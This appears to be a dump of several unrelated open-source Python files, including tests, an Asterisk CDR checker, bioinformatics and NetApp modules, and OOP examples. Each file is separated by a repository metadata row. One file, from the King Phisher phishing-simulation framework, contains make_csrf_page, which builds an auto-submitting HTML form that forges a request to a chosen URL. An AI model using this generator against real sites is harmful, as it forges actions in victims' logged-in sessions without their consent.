assert hamming_distance('karolin', 'kerstin') == 3
assert hamming_distance('1011101', '1001001') == 2
assert hamming_distance('2173896', '2233796') == 3
def test_exact_matches(self):
assert hamming_distance('karolin', 'karolin') == 0
assert hamming_distance('gattaca', 'gattaca') == 0
def test_one_mismatch(self):
assert hamming_distance('niklas', 'niclas') == 1
class TestSearch:
def setUp(self):
self.haystack = 'accgtgacgggcacgaggcatcattatctagcagcacatg'
self.needle = 'gaggcat'
self.genbankdir = os.path.join(os.path.expanduser('~'), 'Dropbox',
'operon_extractor', 'data_genbank')
self.lmg718 = os.path.join(self.genbankdir, 'LMG718-cremoris.gb')
def test_exact_match(self):
res = search(self.needle, self.haystack)
assert res == [14], 'expected one match in pos 14, found {0}' \
.format(str(res))
def test_one_mismatch(self):
res = search(self.needle, self.haystack, mismatches=1)
assert res == [14], 'expected one match in pos 14, found {0}' \
.format(str(res))
res = search('ggg', self.haystack, mismatches=1)
assert res == [3, 7, 8, 9, 14, 15, 16], 'found {0}'.format(str(res))
def test_search_genbank(self):
if not os.path.exists(self.genbankdir):
raise SkipTest
gb = GenBank(self.lmg718)
with open(os.path.join(self.genbankdir, '..', 'primers.txt')) as f:
probe = Sequence(f.readline().strip())
matches = defaultdict(list)
for locus in gb:
matches[locus.name].extend(search(str(probe), str(locus.seq), mismatches=0))
        for locus, starts in matches.items():
for s in starts:
for gbl in gb.get_locus_from_name(locus):
assert gbl.seq[s:s + len(probe)] == probe
| mit | -7,515,088,048,089,271,000 | 34.318841 | 88 | 0.620845 | false | 3.375346 | true | false | false |
asterisk/testsuite | tests/cdr/sqlite3/cdr_sqlite3.py | 2 | 4801 | #!/usr/bin/env python
"""Pluggable module for the sqlite3 test
Copyright (C) 2013, Digium, Inc.
Matt Jordan <[email protected]>
This program is free software, distributed under the terms of
the GNU General Public License Version 2.
"""
import sys
import logging
import sqlite3
import re
sys.path.append("lib/python")
from asterisk.config import ConfigFile
LOGGER = logging.getLogger(__name__)
class CDRSQLite3Verifier(object):
"""A class that verifies CDRs in SQLite3 records"""
def __init__(self, module_config, test_object):
"""Constructor"""
self.module_config = module_config
self.test_object = test_object
# Hook ourselves onto the test object
test_object.register_stop_observer(self.check_cdr_records)
def verify_record(self, actual, expected):
"""Verify two records are the same
Note that we allow fields in actual to exist that aren't
in expected. Every field in expected should exist in the
actual record.
Keyword Arguments:
actual The actual record retrieved
expected The expected record
Returns:
True if the two records are a match
False otherwise
"""
for expected_key, expected_value in expected.items():
if expected_key not in actual:
LOGGER.debug("Field %s is not in actual record" % expected_key)
return False
actual_value = actual[expected_key]
if not re.match(expected_value.lower(),
actual_value.strip().lower()):
LOGGER.debug("Field %s: actual %s != expected %s" %
(expected_key, actual_value, expected_value))
return False
return True
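    # Example (sketch): expected values are treated as regular expressions
    # matched case-insensitively against the start of the actual field, so
    # verify_record({'dst': '1001', 'src': '1000'}, {'dst': '100.'}) is True.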
def get_sqlite_config(self, ast_instance):
"""Retrieve necessary SQLite3 config parameters from the config file
Keyword Arguments:
ast_instance The instance of Asterisk that used the config file
Returns:
Tuple of (table, columns)
"""
sqlite_config_file = ("%s/%s/cdr_sqlite3_custom.conf" %
(ast_instance.base,
ast_instance.directories['astetcdir']))
sqlite_config = ConfigFile(sqlite_config_file)
for option in sqlite_config.categories[0].options:
if option[0] == 'table':
table = option[1]
elif option[0] == 'columns':
columns = [col.strip() for col in option[1].split(',')]
return (table, columns)
def check_cdr_records(self, callback_param):
"""A deferred callback method that is called by the TestCase
derived object when all Asterisk instances have stopped
Parameters:
        callback_param -- opaque value returned unchanged so the deferred chain continues
"""
overall_success = []
for instance in self.module_config:
instance = instance or {}
ast_index = instance.get('asterisk-instance') or 0
database = instance.get('database') or 'master.db'
lines = instance.get('lines')
if not lines:
LOGGER.warning('No expected CDR entries in config?')
continue
ast_instance = self.test_object.ast[ast_index]
LOGGER.debug("Checking CDR records from %s" % ast_instance.host)
table, columns = self.get_sqlite_config(ast_instance)
sqlite_database = "%s/%s/%s" % (ast_instance.base,
ast_instance.directories['astlogdir'],
database)
conn = sqlite3.connect(sqlite_database)
cursor = conn.cursor()
cursor.execute("SELECT %s FROM %s" % (','.join(columns), table))
entries = cursor.fetchall()
# Convert each SQL result to a dictionary of columns, values
cdr_entries = [dict(zip(columns, list(entry))) for entry in entries]
if len(cdr_entries) != len(lines):
LOGGER.error("Expected entries %d != actual number %d" %
(len(lines), len(cdr_entries)))
overall_success.append(False)
continue
# Test each against the expected
for cdr_entry in cdr_entries:
new_lines = [line for line in lines if
not self.verify_record(cdr_entry, line)]
success = (len(new_lines) != len(lines))
if not success:
LOGGER.error("CDR record %s failed to match any expected" %
str(cdr_entry))
overall_success.append(success)
lines = new_lines
conn.close()
self.test_object.set_passed(all(overall_success))
return callback_param
| gpl-2.0 | -2,931,895,642,497,996,300 | 31.883562 | 80 | 0.576963 | false | 4.466047 | true | false | false |
0x0mar/king-phisher | king_phisher/server/pages.py | 1 | 3685 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# king_phisher/server/pages.py
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import sys
import markupsafe
from king_phisher import utilities
if sys.version_info[0] < 3:
import cgi as html
else:
import html
def make_csrf_page(url, params, method='POST'):
"""
A Jinja function which will create an HTML page that will automatically
perform a CSRF attack against another page.
:param str url: The URL to use as the form action.
:param dict params: The parameters to send in the forged request.
:param str method: The HTTP method to use when submitting the form.
"""
escape = lambda s: html.escape(s, quote=True)
form_id = utilities.random_string(12)
page = []
page.append('<!DOCTYPE html>')
page.append('<html lang="en-US">')
page.append(" <body onload=\"document.getElementById(\'{0}\').submit()\">".format(form_id))
page.append(" <form id=\"{0}\" action=\"{1}\" method=\"{2}\">".format(form_id, escape(url), escape(method)))
for key, value in params.items():
page.append(" <input type=\"hidden\" name=\"{0}\" value=\"{1}\" />".format(escape(key), escape(value)))
page.append(' </form>')
page.append(' </body>')
page.append('</html>')
page = '\n'.join(page)
return markupsafe.Markup(page)
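# Illustrative use (hypothetical URL and parameters):
#   make_csrf_page('http://example.com/settings', {'email': '[email protected]'})
# returns markup whose hidden form auto-submits when the page loads.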
def make_redirect_page(url, title='Automatic Redirect'):
"""
A Jinja function which will create an HTML page that will automatically
redirect the viewer to a different url.
:param str url: The URL to redirect the user to.
:param str title: The title to use in the resulting HTML page.
"""
title = html.escape(title, quote=True)
url = html.escape(url, quote=True)
page = []
page.append('<!DOCTYPE html>')
page.append('<html lang="en-US">')
page.append(' <head>')
page.append(" <title>{0}</title>".format(title))
page.append(" <meta http-equiv=\"refresh\" content=\"0;url={0}\" />".format(url))
page.append(' </head>')
page.append(' <body>')
page.append(" <p>The content you are looking for has been moved. If you are not redirected automatically then <a href=\"{0}\">click here</a> to proceed.</p>".format(url))
page.append(' </body>')
page.append('</html>')
page = '\n'.join(page)
return markupsafe.Markup(page)
| bsd-3-clause | 9,211,992,379,730,732,000 | 38.202128 | 174 | 0.710176 | false | 3.550096 | false | false | false |
titilambert/teeawards | old/controllers/ladder.py | 1 | 2145 | from bottle import mako_view, request, response, redirect
from libs.lib import get_player_list
from libs.lib import job_list
from libs.rank import get_rank
from libs.teeworldsserver import twms
from libs.hooks import *
@mako_view('ladder')
@prepare_context
def ladder(sort='score', context={}, gametype=None):
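    # Build per-player stats by running each stats job (kills, ratio,
    # deaths, suicides) for the selected gametype, then sort the rows by
    # the requested column for the ladder view.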
context['page'] = 'ladder'
context['sort'] = sort
if sort not in ['kills', 'suicides', 'deaths', 'score', 'ratio', 'nickname']:
redirect("/ladder")
stats_by_players = []
players = get_player_list()
for player in players:
tmp_dict = {}
# Killer
killjob = getattr(job_list['KillsJob'], 'KillsJob')()
killjob.set_gametype(gametype)
killjob.set_player_name(player)
kills = killjob.get_results()
tmp_dict['kills'] = kills
# Ratio
ratiojob = getattr(job_list['RatiosJob'], 'RatiosJob')()
ratiojob.set_gametype(gametype)
ratiojob.set_player_name(player)
ratio = ratiojob.get_results()
tmp_dict['ratio'] = ratio
# Victim
deathjob = getattr(job_list['DeathsJob'], 'DeathsJob')()
deathjob.set_gametype(gametype)
deathjob.set_player_name(player)
deaths = deathjob.get_results()
tmp_dict['deaths'] = deaths
# Suicider
suicidejob = getattr(job_list['SuicidesJob'], 'SuicidesJob')()
suicidejob.set_gametype(gametype)
suicidejob.set_player_name(player)
suicides = suicidejob.get_results()
tmp_dict['suicides'] = suicides
# Score
tmp_dict['score'] = 0
# Rank
tmp_dict['rank'] = get_rank(player, tmp_dict['score'])
# Save stats
stats_by_players.append((player, tmp_dict))
if sort == 'nickname':
context['stats_by_players'] = sorted([x for x in stats_by_players],
key=lambda x: x[0])
else:
context['stats_by_players'] = sorted([x for x in stats_by_players],
key=lambda x: x[1][sort],
reverse=True)
return context
| agpl-3.0 | 5,629,841,001,260,326,000 | 32.515625 | 81 | 0.578555 | false | 3.465267 | false | false | false |
jefftc/changlab | Betsy/Betsy/modules/annotate_genes_with_david.py | 1 | 4588 | from Module import AbstractModule
class Module(AbstractModule):
def __init__(self):
AbstractModule.__init__(self)
def run(
self, network, antecedents, out_attributes, user_options, num_cores,
outfile):
from genomicode import arrayplatformlib
from genomicode import filelib
f = file(antecedents.identifier, 'r')
text = f.read()
f.close()
in_list = text.split()
# guess the idType
chipname = arrayplatformlib.identify_platform_of_annotations(in_list)
assert chipname in platform2idtype, \
'David does not handle %s' % chipname
idType = platform2idtype[chipname]
# convert the platform to idtype
DAVIDenrich(in_list, idType, outfile)
assert filelib.exists_nz(outfile), (
'the outfile for run_david %s does not exist' % outfile
)
def name_outfile(self, antecedents, user_options):
from Betsy import module_utils
original_file = module_utils.get_inputid(antecedents.identifier)
filename = 'david_' + original_file + '.tdf'
return filename
def DAVIDenrich(
in_list, idType, outfile, bg_list=[], bgName='Background1',
listName='List1', category='', thd=0.1, ct=2):
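    # Query the DAVID web service for a functional-annotation chart report
    # on the genes in in_list and write it to outfile as a tab-delimited
    # table; thd (threshold) and ct (minimum count) are forwarded to
    # getChartReport.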
from suds.client import Client
assert len(in_list) < 3000, (
'the number of genes to David cannot exceed 3000'
)
if len(in_list) > 0:
inputListIds = ','.join(in_list)
    else:
        raise ValueError('no gene IDs were provided to DAVIDenrich')
flagBg = False
if len(bg_list) > 0:
inputBgIds = ','.join(bg_list)
flagBg = True
x = str('http://david.abcc.ncifcrf.gov/') + str(
'webservice/services/DAVIDWebService?wsdl')
client = Client(x)
client.service.authenticate('[email protected]')
listType = 0
client.service.addList(inputListIds, idType, listName, listType)
if flagBg:
listType = 1
client.service.addList(inputBgIds, idType, bgName, listType)
client.service.setCategories(category)
chartReport = client.service.getChartReport(thd, ct)
with open(outfile, 'w') as fOut:
header = ['Category', 'Term', 'Count', '%', 'Pvalue', 'Genes',
'List Total', 'Pop Hits', 'Pop Total', 'Fold Enrichment',
'Bonferroni', 'Benjamini', 'FDR\n']
fOut.write('\t'.join(header))
for row in chartReport:
rowDict = dict(row)
categoryName = str(rowDict['categoryName'])
termName = str(rowDict['termName'])
listHits = str(rowDict['listHits'])
percent = str(rowDict['percent'])
ease = str(rowDict['ease'])
Genes = str(rowDict['geneIds'])
listTotals = str(rowDict['listTotals'])
popHits = str(rowDict['popHits'])
popTotals = str(rowDict['popTotals'])
foldEnrichment = str(rowDict['foldEnrichment'])
bonferroni = str(rowDict['bonferroni'])
benjamini = str(rowDict['benjamini'])
FDR = str(rowDict['afdr'])
rowList = [categoryName, termName, listHits, percent, ease, Genes,
listTotals, popHits, popTotals, foldEnrichment,
bonferroni, benjamini, FDR]
fOut.write('\t'.join(rowList) + '\n')
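# Maps array platform names (as detected by arrayplatformlib) to the
# idType strings accepted by DAVID.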
platform2idtype = {
'MG_U74Av2': 'AFFYMETRIX_3PRIME_IVT_ID',
'HG_U133_Plus_2': 'AFFYMETRIX_3PRIME_IVT_ID',
'Mu11KsubA': 'AFFYMETRIX_3PRIME_IVT_ID',
'Mu11KsubB': 'AFFYMETRIX_3PRIME_IVT_ID',
'Hu6800': 'AFFYMETRIX_3PRIME_IVT_ID',
'HG_U133B': 'AFFYMETRIX_3PRIME_IVT_ID',
'Mouse430_2': 'AFFYMETRIX_3PRIME_IVT_ID',
'RG_U34A': 'AFFYMETRIX_3PRIME_IVT_ID',
'Mouse430A_2': 'AFFYMETRIX_3PRIME_IVT_ID',
'HG_U95A': 'AFFYMETRIX_3PRIME_IVT_ID',
'HG_U133A': 'AFFYMETRIX_3PRIME_IVT_ID',
'RAE230A': 'AFFYMETRIX_3PRIME_IVT_ID',
'Hu35KsubC': 'AFFYMETRIX_3PRIME_IVT_ID',
'Hu35KsubB': 'AFFYMETRIX_3PRIME_IVT_ID',
'MG_U74Cv2': 'AFFYMETRIX_3PRIME_IVT_ID',
'HG_U133A_2': 'AFFYMETRIX_3PRIME_IVT_ID',
'Hu35KsubA': 'AFFYMETRIX_3PRIME_IVT_ID',
'Hu35KsubD': 'AFFYMETRIX_3PRIME_IVT_ID',
'MG_U74Bv2': 'AFFYMETRIX_3PRIME_IVT_ID',
'HG_U95Av2': 'AFFYMETRIX_3PRIME_IVT_ID',
'HumanHT_12': 'ILLUMINA_ID',
'HumanWG_6': 'ILLUMINA_ID',
'MouseRef_8': 'ILLUMINA_ID',
'HumanHT_12_control': 'ILLUMINA_ID',
'MouseRef_8_control': 'ILLUMINA_ID',
'Entrez_ID_human': 'ENTREZ_GENE_ID',
'Entrez_ID_mouse': 'ENTREZ_GENE_ID',
'Entrez_symbol_human': 'GENE_SYMBOL',
'Entrez_symbol_mouse': 'GENE_SYMBOL'
}
| mit | -7,182,829,996,638,434,000 | 37.554622 | 78 | 0.605929 | false | 2.924156 | false | false | false |
shsingh/ansible | lib/ansible/modules/storage/netapp/na_ontap_net_port.py | 38 | 7603 | #!/usr/bin/python
# (c) 2018-2019, NetApp, Inc
# GNU General Public License v3.0+
# (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'certified'}
DOCUMENTATION = """
module: na_ontap_net_port
short_description: NetApp ONTAP network ports.
extends_documentation_fragment:
- netapp.na_ontap
version_added: '2.6'
author: NetApp Ansible Team (@carchi8py) <[email protected]>
description:
- Modify an ONTAP network port.
options:
state:
description:
- Whether the specified net port should exist or not.
choices: ['present']
default: present
node:
description:
- Specifies the name of node.
required: true
ports:
aliases:
- port
description:
- Specifies the name of port(s).
required: true
mtu:
description:
- Specifies the maximum transmission unit (MTU) reported by the port.
autonegotiate_admin:
description:
- Enables or disables Ethernet auto-negotiation of speed,
duplex and flow control.
duplex_admin:
description:
- Specifies the user preferred duplex setting of the port.
    - Valid values are auto, half, full.
speed_admin:
description:
- Specifies the user preferred speed setting of the port.
flowcontrol_admin:
description:
- Specifies the user preferred flow control setting of the port.
ipspace:
description:
- Specifies the port's associated IPspace name.
- The 'Cluster' ipspace is reserved for cluster ports.
"""
EXAMPLES = """
- name: Modify Net Port
na_ontap_net_port:
state: present
username: "{{ netapp_username }}"
password: "{{ netapp_password }}"
hostname: "{{ netapp_hostname }}"
node: "{{ node_name }}"
ports: e0d,e0c
autonegotiate_admin: true
"""
RETURN = """
"""
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
import ansible.module_utils.netapp as netapp_utils
from ansible.module_utils.netapp_module import NetAppModule
HAS_NETAPP_LIB = netapp_utils.has_netapp_lib()
class NetAppOntapNetPort(object):
"""
Modify a Net port
"""
def __init__(self):
"""
Initialize the Ontap Net Port Class
"""
self.argument_spec = netapp_utils.na_ontap_host_argument_spec()
self.argument_spec.update(dict(
state=dict(required=False, choices=['present'], default='present'),
node=dict(required=True, type="str"),
ports=dict(required=True, type="list", aliases=['port']),
mtu=dict(required=False, type="str", default=None),
autonegotiate_admin=dict(required=False, type="str", default=None),
duplex_admin=dict(required=False, type="str", default=None),
speed_admin=dict(required=False, type="str", default=None),
flowcontrol_admin=dict(required=False, type="str", default=None),
ipspace=dict(required=False, type="str", default=None),
))
self.module = AnsibleModule(
argument_spec=self.argument_spec,
supports_check_mode=True
)
self.na_helper = NetAppModule()
self.parameters = self.na_helper.set_parameters(self.module.params)
self.set_playbook_zapi_key_map()
if HAS_NETAPP_LIB is False:
self.module.fail_json(msg="the python NetApp-Lib module is required")
else:
self.server = netapp_utils.setup_na_ontap_zapi(module=self.module)
return
def set_playbook_zapi_key_map(self):
self.na_helper.zapi_string_keys = {
'mtu': 'mtu',
'autonegotiate_admin': 'is-administrative-auto-negotiate',
'duplex_admin': 'administrative-duplex',
'speed_admin': 'administrative-speed',
'flowcontrol_admin': 'administrative-flowcontrol',
'ipspace': 'ipspace'
}
def get_net_port(self, port):
"""
Return details about the net port
:param: port: Name of the port
:return: Dictionary with current state of the port. None if not found.
:rtype: dict
"""
net_port_get = netapp_utils.zapi.NaElement('net-port-get-iter')
attributes = {
'query': {
'net-port-info': {
'node': self.parameters['node'],
'port': port
}
}
}
net_port_get.translate_struct(attributes)
try:
result = self.server.invoke_successfully(net_port_get, True)
if result.get_child_by_name('num-records') and int(result.get_child_content('num-records')) >= 1:
port_info = result['attributes-list']['net-port-info']
port_details = dict()
else:
return None
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error getting net ports for %s: %s' % (self.parameters['node'], to_native(error)),
exception=traceback.format_exc())
for item_key, zapi_key in self.na_helper.zapi_string_keys.items():
port_details[item_key] = port_info.get_child_content(zapi_key)
return port_details
def modify_net_port(self, port, modify):
"""
Modify a port
:param port: Name of the port
:param modify: dict with attributes to be modified
:return: None
"""
port_modify = netapp_utils.zapi.NaElement('net-port-modify')
port_attributes = {'node': self.parameters['node'],
'port': port}
for key in modify:
if key in self.na_helper.zapi_string_keys:
zapi_key = self.na_helper.zapi_string_keys.get(key)
port_attributes[zapi_key] = modify[key]
port_modify.translate_struct(port_attributes)
try:
self.server.invoke_successfully(port_modify, enable_tunneling=True)
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error modifying net ports for %s: %s' % (self.parameters['node'], to_native(error)),
exception=traceback.format_exc())
def autosupport_log(self):
"""
AutoSupport log for na_ontap_net_port
:return: None
"""
results = netapp_utils.get_cserver(self.server)
cserver = netapp_utils.setup_na_ontap_zapi(module=self.module, vserver=results)
netapp_utils.ems_log_event("na_ontap_net_port", cserver)
def apply(self):
"""
Run Module based on play book
"""
self.autosupport_log()
# Run the task for all ports in the list of 'ports'
for port in self.parameters['ports']:
current = self.get_net_port(port)
modify = self.na_helper.get_modified_attributes(current, self.parameters)
if self.na_helper.changed:
if self.module.check_mode:
pass
else:
if modify:
self.modify_net_port(port, modify)
self.module.exit_json(changed=self.na_helper.changed)
def main():
"""
Create the NetApp Ontap Net Port Object and modify it
"""
obj = NetAppOntapNetPort()
obj.apply()
if __name__ == '__main__':
main()
| gpl-3.0 | -154,933,924,975,446,620 | 32.641593 | 123 | 0.598843 | false | 3.923117 | false | false | false |
edenhill/muckrake | muckrake/services/background_thread.py | 1 | 2892 | # Copyright 2015 Confluent Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ducktape.services.service import Service
import threading
class BackgroundThreadService(Service):
def __init__(self, context, num_nodes):
super(BackgroundThreadService, self).__init__(context, num_nodes)
self.worker_threads = []
self.worker_errors = {}
self.lock = threading.RLock()
def _protected_worker(self, idx, node):
"""Protected worker captures exceptions and makes them available to the main thread.
This gives us the ability to propagate exceptions thrown in background threads, if desired.
"""
try:
self._worker(idx, node)
except BaseException as e:
with self.lock:
self.worker_errors[threading.currentThread().name] = e
raise e
def start_node(self, node):
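        # Run the subclass's _worker on a daemon thread so a worker that
        # hangs cannot keep the process alive after the service is stopped.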
idx = self.idx(node)
self.logger.info("Running %s node %d on %s", self.__class__.__name__, idx, node.account.hostname)
worker = threading.Thread(
name=self.__class__.__name__ + "-worker-" + str(idx),
target=self._protected_worker,
args=(idx, node)
)
worker.daemon = True
worker.start()
self.worker_threads.append(worker)
def wait(self):
super(BackgroundThreadService, self).wait()
for idx, worker in enumerate(self.worker_threads, 1):
self.logger.debug("Waiting for worker thread %s finish", worker.name)
worker.join()
self.worker_threads = None
# Propagate exceptions thrown in background threads
with self.lock:
if len(self.worker_errors) > 0:
raise Exception(str(self.worker_errors))
def stop(self):
if self.worker_threads is not None:
self.logger.warn(
"At least one worker thread is still running - this might occur if self.stop() is called " +
"before self.wait(). This could happen if wait() was omitted, or if an Exception triggered "
"teardown logic before wait() was reached.")
self.logger.warn("%s" % str(self.worker_threads))
super(BackgroundThreadService, self).stop()
def stop_node(self, node):
# do nothing
pass
def clean_node(self, node):
# do nothing
pass
| apache-2.0 | -2,832,471,914,038,739,000 | 33.843373 | 108 | 0.630705 | false | 4.297177 | false | false | false |
blab/nextstrain-augur | augur/mask.py | 1 | 3288 | """
Mask specified sites from a VCF file.
"""
from Bio import SeqIO
import pandas as pd
import os
import numpy as np
from .utils import run_shell_command
def get_mask_sites(vcf_file, mask_file):
'''
    Creates a temporary file in the format vcftools expects
    (two-column, tab-separated: "chromName" "position")
'''
#Need CHROM name from VCF file:
import gzip
opn = gzip.open if vcf_file.lower().endswith('.gz') else open
with opn(vcf_file, mode='rt') as f: #'rt' necessary for gzip
for line in f:
if line[0] != "#":
header = line.strip().split('\t')
chromName = header[0]
break # once chrom is found, no need to go through rest
#Read in BED file - 2nd column always chromStart, 3rd always chromEnd
#I timed this against sets/update/sorted; this is faster
sitesToMask = []
bed = pd.read_csv(mask_file, sep='\t')
for index, row in bed.iterrows():
sitesToMask.extend(list(range(row[1], row[2]+1)))
sitesToMask = np.unique(sitesToMask)
exclude = []
for pos in sitesToMask:
exclude.append(chromName+"\t"+str(pos))
tempMaskFile = mask_file+"_maskTemp"
with open(tempMaskFile, 'w') as the_file:
the_file.write("\n".join(exclude))
return tempMaskFile
def register_arguments(parser):
parser.add_argument('--sequences', '-s', required=True, help="sequences in VCF format")
parser.add_argument('--mask', required=True, help="locations to be masked in BED file format")
parser.add_argument('--output', '-o', help="output file")
def run(args):
'''
    Mask specified sites from the VCF.
    This works by removing those sites from the VCF entirely, which makes
    them identical to the reference at those locations.
    If no output file is specified, the input file is overwritten.
'''
tempMaskFile = get_mask_sites(args.sequences, args.mask)
#Read in/write out according to file ending
inCall = "--gzvcf" if args.sequences.lower().endswith('.gz') else "--vcf"
if args.output:
outCall = "| gzip -c" if args.output.lower().endswith('.gz') else ""
else:
outCall = "| gzip -c" if args.sequences.lower().endswith('.gz') else ""
#vcftools doesn't like input/output being the same file.
#If no output specified, they will be, so use copy of input we'll delete later
in_file = args.sequences
out_file = args.output
if not(args.output):
from shutil import copyfile
out_file = in_file
in_file = args.sequences+"_temp"
copyfile(args.sequences, in_file)
call = ["vcftools", "--exclude-positions", tempMaskFile, inCall, in_file, "--recode --stdout", outCall, ">", out_file]
print("Removing masked sites from VCF file using vcftools... this may take some time. Call:")
print(" ".join(call))
run_shell_command(" ".join(call), raise_errors = True)
os.remove(tempMaskFile) #remove masking file
# remove vcftools log file
try:
os.remove('out.log')
except OSError:
pass
#remove copy of input if there was no output specified
if not(args.output):
os.remove(in_file)
| agpl-3.0 | -2,466,841,330,359,204,400 | 33.354839 | 122 | 0.625304 | false | 3.753425 | false | false | false |
estaban/pyload | module/plugins/crypter/DataHuFolder.py | 1 | 2725 | # -*- coding: utf-8 -*-
############################################################################
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU Affero General Public License as #
# published by the Free Software Foundation, either version 3 of the #
# License, or (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU Affero General Public License for more details. #
# #
# You should have received a copy of the GNU Affero General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
############################################################################
import re
from module.plugins.internal.SimpleCrypter import SimpleCrypter
class DataHuFolder(SimpleCrypter):
__name__ = "DataHuFolder"
__version__ = "0.03"
__type__ = "crypter"
__pattern__ = r'http://(?:www\.)?data.hu/dir/\w+'
__description__ = """Data.hu folder decrypter plugin"""
__author_name__ = ("crash", "stickell")
__author_mail__ = "[email protected]"
LINK_PATTERN = r"<a href='(http://data\.hu/get/.+)' target='_blank'>\1</a>"
TITLE_PATTERN = ur'<title>(?P<title>.+) Let\xf6lt\xe9se</title>'
def decrypt(self, pyfile):
self.html = self.load(pyfile.url, decode=True)
if u'K\xe9rlek add meg a jelsz\xf3t' in self.html: # Password protected
password = self.getPassword()
            if password == '':
self.fail("No password specified, please set right password on Add package form and retry")
self.logDebug('The folder is password protected', 'Using password: ' + password)
self.html = self.load(pyfile.url, post={'mappa_pass': password}, decode=True)
if u'Hib\xe1s jelsz\xf3' in self.html: # Wrong password
self.fail("Incorrect password, please set right password on Add package form and retry")
package_name, folder_name = self.getPackageNameAndFolder()
package_links = re.findall(self.LINK_PATTERN, self.html)
self.logDebug('Package has %d links' % len(package_links))
if package_links:
self.packages = [(package_name, package_links, folder_name)]
else:
self.fail('Could not extract any links')
| gpl-3.0 | -7,027,289,889,388,146,000 | 46.807018 | 107 | 0.557431 | false | 4.135053 | false | false | false |
mikar/60-days-of-python | oop/basics/various/various_1.py | 1 | 3703 | """
Created on 22 Mar 2014
@author: Max Demian
"""
#==============================================================================
# Multiple Inheritance
#==============================================================================
# We use super() here. If we used direct class calls instead i.e.
# BaseClass.call_me(self) etc, we'd end up with 2 calls to BaseClass
# Why? Because LeftSubclass calls RightSubclass with super() as next class
class BaseClass(object):
num_base_calls = 0
def call_me(self):
print "Calling method on Base Class"
self.num_base_calls += 1
class LeftSubclass(BaseClass):
num_left_calls = 0
def call_me(self):
super(LeftSubclass, self).call_me()
print "Calling method on Left Subclass"
self.num_left_calls += 1
class RightSubclass(BaseClass):
num_right_calls = 0
def call_me(self):
super(RightSubclass, self).call_me()
print "Calling method on Right Subclass"
self.num_right_calls += 1
class Subclass(LeftSubclass, RightSubclass):
num_sub_calls = 0
def call_me(self):
super(Subclass, self).call_me()
print "Calling method on Subclass"
self.num_sub_calls += 1
#==============================================================================
# Polymorphism
#==============================================================================
class AudioFile(object):
def __init__(self, filename):
if not filename.endswith(self.ext):
raise Exception("Invalid file format")
self.filename = filename
class MP3File(AudioFile):
ext = "mp3"
def play(self):
print "playing {} as mp3".format(self.filename)
class WavFile(AudioFile):
ext = "wav"
def play(self):
print "playing {} as wav".format(self.filename)
class OggFile(AudioFile):
ext = "ogg"
def play(self):
print "playing {} as ogg".format(self.filename)
class FlacFile(object):
def __init__(self, filename):
if not filename.endswith(".flac"):
raise Exception("Invalid file format")
self.filename = filename
def play(self):
print "playing {} as flac".format(self.filename)
class InvalidItemType(Exception):
def __init__(self, item_type):
        super(InvalidItemType, self).__init__("Sorry, we don't sell", item_type)
class Inventory(object):
stock = {"widget": 2}
def __init__(self):
self.locked = False
def lock(self, item_type):
print item_type, "locked"
self.locked = True
def unlock(self, item_type):
print item_type, "unlocked"
self.locked = False
def purchase(self, item_type):
if self.locked:
raise Exception("Sorry, item is locked.")
if item_type not in self.stock:
raise Exception("Sorry, we don't sell", item_type)
if not self.stock[item_type]:
raise InvalidItemType(item_type)
print "Purchase complete. There are {} {}s left.".format(
self.stock[item_type] - 1, item_type)
def test_inventory():
item_type = 'widget'
inv = Inventory()
# ~ inv.lock(item_type)
inv.purchase(item_type)
inv.unlock(item_type)
inv.purchase(item_type)
if __name__ == '__main__':
s = Subclass()
s.call_me()
print(s.num_sub_calls, s.num_left_calls, s.num_right_calls,
s.num_base_calls)
ogg = OggFile("myfile.ogg")
ogg.play()
mp3 = MP3File("myfile.mp3")
mp3.play()
# This will raise the exception for wrong filetype, even though we don't
# actually check the type of the file.
# not_mp3 = MP3File("myfile.ogg")
# Custom Exceptions
test_inventory()
| mit | -3,229,084,793,834,422,000 | 26.634328 | 79 | 0.564947 | false | 3.906118 | false | false | false |
